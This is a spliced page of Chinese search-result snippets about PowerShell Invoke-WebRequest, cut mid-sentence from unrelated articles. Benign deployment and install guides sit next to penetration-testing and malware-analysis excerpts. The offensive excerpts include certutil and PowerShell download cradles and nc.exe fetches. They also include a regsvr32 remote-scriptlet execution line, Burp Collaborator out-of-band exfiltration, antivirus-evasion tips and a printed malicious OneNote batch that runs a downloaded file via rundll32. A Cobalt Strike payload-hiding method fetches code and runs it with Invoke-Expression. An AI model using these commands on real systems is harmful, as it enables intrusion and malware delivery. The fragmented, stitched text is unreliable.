创建一个网站并使用这个应用程序池 接下来要创建一个应用程序池,名称为TestApp New-Item -path IIS:\AppPools\TestApp 把应用程序池的.Net版本设置为无托管代码...部署到IIS时的关键命令,知道了这些就可以来写一个完整自动部署脚本了。...以部署ZKEACMS为例,创建一个名为ZKEACMS.ps1的文件,并将以下代码粘贴到文件中保存。.../ZKEACMS.ps1 或者可以直接鼠标右键该脚本文件,然后选择菜单中的使用 PowerShell 运行 如果你的脚本在网络上,可以直接在控制台中使用以下脚本来运行而不用下载它,例如可以使用以下脚本来在线安装...ZKEACMS: @powershell -NoProfile -ExecutionPolicy unrestricted -Command "&([scriptblock]::Create((Invoke-WebRequest
是一个登陆框,使用弱口令和注入都无果。在网页中发现了 login as guest页面。 ? ? 留言中Hazard留言说思科路由器存在问题,并且附上了配置文件。我发现配置文件中含有三个加密的密码。...想办法拿到进程日志。 ? 接下来使用ProcDump.exe提取filefox的进程文件,其中firefox的pid为6804。...上传至靶机,这里我使用了powershell 的Invoke-WebRequest从本机进行上传,前提是打开本机http服务,通过80端口进行传输。.../procdump.exe -mp 6804 导出对应的进程文件。 ?...4.寻找主机的其他用户 5.5985端口的入侵以及拿shell 6.找管理员操作进程,提取进程文件,拿到管理员密码,并拿shell。
上一条条执行的,在 PowerShell 里面 # 代表这一行是注释。...而 表示这是一行命令,因此咱只需要在 PowerShell 里面输入 后面的内容 其实上面代码只是从 https://github.com/actions/runner/releases/download.../v2.274.2/actions-runner-win-x64-2.274.2.zip 下载运行器,下载完成之后解压缩到文件夹 而使用 Invoke-WebRequest 的下载速度不够快,此时我和大家安利的下载工具...的 Action 进行持续集成 可以了解是如何写 YAML 配置文件的,而咱需要在这个配置文件里面修改使用自己部署的运行器 jobs: build: # 将 windows-latest 换为....NET 社区 以上广告全是友情推广,无盈利
在渗透测试中,在正常的传输通道被禁止时,我们时常会剑走偏锋,通过一些特殊的方法来进行文件的传输。这篇文章将会描述使用 PowerShell 下载文件的三种方法,并评估它们的优缺点。...1.Invoke-WebRequest 说到使用 PowerShell 下载文件,最先想到的就是 Invoke-WebRequest 命令。...缺点 使用这个命令下载文件的速度很慢。我观察到 HTTP 响应流先全部缓存到了内存中,一旦文件全部传输完毕,文件就会从内存中一下子转移到磁盘中。...结论 当你需要在多个请求时保留 Cookie(例如下载文件之前的 HTTP 表单验证),那么这个命令会很有用。 这种方法很适合用来下载小文件,但是如果你对下载速度有要求,那肯定会有更好的选择。...工作方式为异步下载文件,并且用于同步下载文件时也有十分优异的表现。还有一个BitsAdmin 工具使用的也是这个后台智能传输服务。 ? ? ?
certutil -urlcache -split -f http://***.burpcollaborator.net powershell (Invoke-WebRequest -Uri "http...Burp -> Burp Collaborator client Project options -> Misc -> Run health check 如遇安全防护时也可以去尝试下@倾旋师傅“Regsvr32...ole对象”文中提到的方法,通过修改脚本文件内容来外带不同命令的执行结果,如:查看当前权限、进程/服务、文件和目录及下载文件等。...scriptlet> wmic process call create "regsvr32 /s /n /u /i:http://192.168.1.120:8888/down.txt scrobj.dll" 文件下载脚本...模块浏览器:https://docs.microsoft.com/zh-cn/powershell/module/ 文末总结: 遇到这种无回显命令执行或SQL盲注漏洞,我们可以先去看一下目标主机是否能够出网
用procmon 左侧选System进程或业务进程,选择后点“view → Lower Pane View → Dlls (Ctrl+D)”,在下方会显示.sys、.dll procexp查看Privileges...explorer的dump日志(任务管理器 → 详细信息 → 找到未响应的explorer.exe右击点"创建转储文件")以及网络报文,如果资源管理器卡到不足以收集转储文件和网络报文,想办法收集内存转储文件...(①需提前配置pagefile 30G,太小可能不足以生成充分信息的.dmp文件;②收集时,需要在母机上注入nmi中断,触发Windows系统主动蓝屏并生成dump文件,过程中耐心等待不要人为干预机器状态直到恢复正常...,把c:\windows\memory.dmp的.7z压缩包提供过来) 其次,需要收集网络报文,步骤: Step1:从微软网站上下载Network Monitor(确认选取目标机器对应平台的安装包)...的wget,powershell的wget实际是这个命令的简写invoke-webrequest 因为出现问题的时候powershell用不了,所以得准备一个cmd命令能用的下载工具,就是wget.exe
在Windows上运行Docker Linux容器需要一个最小的Linux内核和承载容器进程的用户空间。...安装Docker和LinuxKit 以管理员身份在PowerShell中运行以下命令即可以获取LinuxKit的预览版本: $progressPreference = 'silentlyContinue...' mkdir "$Env:ProgramFiles\Linux Containers” Invoke-WebRequest -UseBasicParsing -OutFile linuxkit.zip...举例来说,Windows上的Docker Linux容器将使得在Windows Server上建立Docker企业版和Universal Control Plane(依赖于某些仅限于Linux的组件)变得更为简单...更多资源 下载Docker Windows 10版和Docker Windows Server版 了解有关Docker企业版的更多信息 在DockerCon上参与关于Windows上的Linux容器和LinuxKit
比如执行,下载,-bypass参数来匹配恶意行为,或者是直接套用微软的powershell语言限制模式,当然,这几种模式没有优劣之分,我们红军需要的是用已知的技术解决方案满足企业的安全需求,我们防守方的优势在于攻击者对于我们安全防线水位的未知...做一个简单的总结,攻击者有哪些常见执行exe的方法以及变种呢(仅针对windows) 后缀替换(这名字取得很不专业) 比如用ps1,bat,vbs,dll,hta等文件 语言脚本 常见的比如aspx,php...,你7zip进程起的进程,不让执行,当然,这很考验企业的基础设施 白+黑 就执行exe来说,我们出了通过双击,cmd运行以外,还可以存在如下运行方式 利用pcalua Pcalua -m -a axgg.exe...能够下载文件,但是我很少看见师傅用这个命令,Invoke-webrequest powershell.exe Invoke-webrequest -uri http://192.168.1.28:1456.../test.txt -o test.txt 而我们的Invoke-webrequest ==》 iwr powershell.exe iwr -uri http://192.168.1.28:1456/
CreepyDrive CreepyDrive 利用 OneDrive 进行 C&C 通信,样本具备上传下载文件的基本功能。...data.txt 文件指示恶意程序要执行的任务,主要是三个分支。 Upload 响应中为 Upload 时,触发该分支。还需要包含两个信息:要上传的本地文件路径、攻击者自定义的远程文件名。...Download 响应中为 Download 时,触发该分支。...Execute 未响应任何指令时,将进入该分支。响应中可以包含要执行的命令数组或先前下载文件的文件路径。攻击者也可以使用单命令与文件路径的组合。...△CreepySnail PowerShell 代码 公共工具的使用 POLONIUM 通过 OneDrive 下载了一个辅助程序 plink,这是一种常见的自动化交互式 SSH 工具。
DownloadFile("http://10.0.0.10/nc.exe","nc.exe") Win 8及更高版本PowerShell Invoke-WebRequest (wget): wget..."http://10.0.0.10/nc.exe" -outfile "nc.exe" 获取帮助 get-help 进程相关 start-process get-process stop-process...(kill) ps 一般利用步骤 绕过相关策略->下载相应脚本->执行脚本->(其他脚本下载执行利用) 0x03 PowerSploit PowerSploit是GitHub上面的一个安全项目,上面有很多...Get-SecurityPackages 四、绕过杀毒软件(AntivirusBypass) Find-AVSignature 五、信息收集(Exfiltration) 这个文件夹主要是收集目标主机上的信息...六、信息侦察(Recon) 这个文件夹主要是以目标主机为跳板进行内网主机侦察。
它将收集的信息组织成简单的可操作数据,这将有助于您的应用程序变得无异常。最重要的是,它是开源的!...大概意思就是我的电脑同时安装了.NET 4.0 和.NET 4.5或更高版本,这导致加密协议的默认值为 SSLv3和 TLSv1,而Powershell需要使用 Tls12才能正常使用 Invoke-WebRequest...Powershell脚本中要下载的是什么文件,自己单独先把文件下载好放在它指定的位置就可以了,我就是这么干的。。...不过我是因为Powershell这个下载太慢了) OK,重新执行 Start.bat,可以正常下载,也启动了ElasticSearch和Kibana ?...Exceptionless注册用户 这里跟前面使用官网服务时是一样的,注册用户,新建项目,获得Api密钥 ? 4.
在Windows上运行Docker,只需要一个很小的Linux内核和用户空间来承载容器进程。这正是LinuxKit工具包的设计初衷——创建安全的、精简的、可移植的Linux子系统。...安装Docker和LinuxKit 只需要在PowerShell中运行以下命令(具有管理员权限),就可以使用由LinuxKit构建的预览体验版了: $progressPreference = 'silentlyContinue...' mkdir "$Env:ProgramFiles\Linux Containers” Invoke-WebRequest -UseBasicParsing -OutFile linuxkit.zip...譬如,在Windows系统上的Docker,将使Windows 服务器上的Docker企业版和可视化管理界面(依赖某些Linux独占的组件)的设置步骤变得更加简单。...更多资源 下载Docker for Windows 10和Docker for Windows Serve 了解有关Docker企业版的更多信息 加入“在Windows上使用Docker容器和LinuxKit
.exe 打开powershell,执行以下命令。...# 下载并运行最新版本的安装程序。...# 添加二进制文件,确保以Administrator.minikube.exePATH运行PowerShell $oldPath = [Environment]::GetEnvironmentVariable...下载kubectl版本。...Kubernetes 而不影响已部署的应用程序 minikube pause 取消暂停 minikube unpause 启动集群 minikube start 暂停群集 minikube stop
certutil下载文件 一般我最常使用的certutil的功能就是在cmd环境下下载文件,因为certutil是windows自带的exe,所以在使用的时候会比其他exe或者vbs更加方便。...但是因为在下载文件的过程中也会创建进程,所以也遭到了各大杀软的拦截。...一般使用certutil下载文件的命令为 certutil -urlcache -split -f http://ip/artifact.exe 这里介绍一下参数 •-f 覆盖现有文件。...后面跟要下载的文件 url。•-split 保存到文件。无值的命令行选项。加了的话就可以下载到当前路径,不加就下载到了默认路径。•-URLCache 显示或删除URL缓存条目。无值的命令行选项。...内存加载 这里我在本地实验因为环境变量的原因报错,这里还是粗略的写一下大致实现过程 首先修改powershell策略为可执行脚本 下载powershell混淆框架并执行 Import-Module .
他们从 CLI 构建包下载 ZIP/tarball 文件,然后继续将其安装在默认位置或由-InstallDir|--install-dir. 默认情况下,安装脚本会下载 SDK 并进行安装。...他们只是下载压缩的二进制文件并将它们复制到一个文件夹中。如果您希望更新注册表项值,请使用 .NET 安装程序。...从 5.0 版本开始可用。 当使用除版本之外的任何版本时,该version参数会覆盖该channel参数latest。 默认值为LTS。...如果您更喜欢自己安装或下载它,它还会显示二进制文件的位置。 -FeedCredential|--feed-credential 用作附加到 Azure 源的查询字符串。...该global.json文件必须有一个值sdk:version。 -NoCdn|--no-cdn 禁用从Azure 内容交付网络 (CDN) 下载并直接使用未缓存的源。
往下拖的时候,发现了里面有几张图片的文件头和文件尾的16进制数。文件里应该是有图片。拖到后面,发现了一段powershell命令。直接复制出来。...@echo off powershell Invoke-WebRequest -URI https://xxxxx.org/aswyw/01.gif -OutFile C:\programdata\putty.jpg...rundll32 C:\programdata\putty.jpg,Wind exit 这里的内容主要就两句了,从web上去下载文件到C:\programdata\putty.jpg,然后用rundll32...@echo off start https://www.onenote.com/ powershell Invoke-WebRequest -URI https://xxx.org/aswyw/01.gif...所以只要用户点击了,我们能执行cmd里的命令,就不要去调powershell了,可以尝试找一下白程序去下载文件然后执行等等思路,这里就不细说,仅仅是一个抛砖引玉,欢迎师傅们跟我交流。
certutil下载文件 一般我最常使用的certutil的功能就是在cmd环境下下载文件,因为certutil是windows自带的exe,所以在使用的时候会比其他exe或者vbs更加方便。...但是因为在下载文件的过程中也会创建进程,所以也遭到了各大杀软的拦截。...一般使用certutil下载文件的命令为 certutil -urlcache -split -f http://ip/artifact.exe 这里介绍一下参数 •-f 覆盖现有文件。...后面跟要下载的文件 url。•-split 保存到文件。无值的命令行选项。加了的话就可以下载到当前路径,不加就下载到了默认路径。•-URLCache 显示或删除URL缓存条目。无值的命令行选项。...下载powershell混淆框架并执行 Import-Module .\Invoke-CradleCrafter.ps1Invoke-CradleCrafter ?
从时间线我们可以看出,自 2019 年 3 月 6 号的驱动人生木马后门新增了 “无文件攻击技术”,并于 2019 年 4 月 4 日被发现直接驻留在内存中,进行挖矿。...“无文件攻击” 是指恶意程序文件没有直接落地到目标系统的磁盘空间的攻击手法,一般情况下,“无文件攻击”会把攻击载荷直接载入到内存空间中执行,或者依附于合法的系统进程来进行恶意操作。...现代的 “无文件攻击” 大多是基于 Powershell 的整个攻击链、攻击步骤完全无文件,恶意代码依附于可信的系统进程。综上我们可以知道:“无文件攻击” 极其善于躲避检测、对抗杀软。...我们可以从通信角度来看 ”驱动人生木马后门的无文件攻击“ 首先,我们可以查看数据流,驱动人生木马,有个比较明显的通信特征,会以 Get 方式回传被控主机信息。 ?...下载文件时亦会产生通信,所以针对其不变的通信特征,我们可以对其进行监测。 ? ?
更纱黑体是一款开源免费的字体,大家可以直接在Windows10应用商店中找到下载。 ?...安装Windows Terminal最简单的办法也是从Windows 10商店。 ?...配置文件介绍 默认Windows Terminal不够好看,但是目前它仅支持从配置文件修改,所以我向大家简单介绍一下Windows Terminal的配置文件格式,大家可以自行修改出自己喜欢的样式来。...修改完毕之后,Windows Terminal应该也会变得比较好看。 ? 当然如果你不想编辑配置文件,也可以直接使用我的配置文件,我的配置文件其实也就是修改了一下透明度和字体而已。...Invoke-WebRequest -uri 'https://gitee.com/techstay/dotfiles/raw/master/windowsterminal/profiles.json'
第一种,在百度中传输payload 首先建立如下c2配置文件,贴上部分代码,官方wiki介绍在这里:https://www.cobaltstrike.com/help-malleable-c2 http-get...然后我们让payload的响应数据出现在如下html中: ? 而这个html正是我copy的正常百度的: ? 目的也是为了让我们的payload隐藏在看似就是百度给的响应包中。...而我们的目的就是在这些白名单网站中植入payload,让受害者机器下载执行。 本来想以github测试,发现墙是真的厚。...然后我们以powershell为例,进行如下步骤: 1、访问植入payload的页面(Invoke-WebRequest) 2、获取payload(Regex) 3、执行payload(Invoke-expression...) 这里直接给出payload: $data = Invoke-WebRequest -Uri https://www.yuque.com/docs/share/444cd7ff-72aa-4066-945e
领取专属 10元无门槛券
手把手带您无忧上云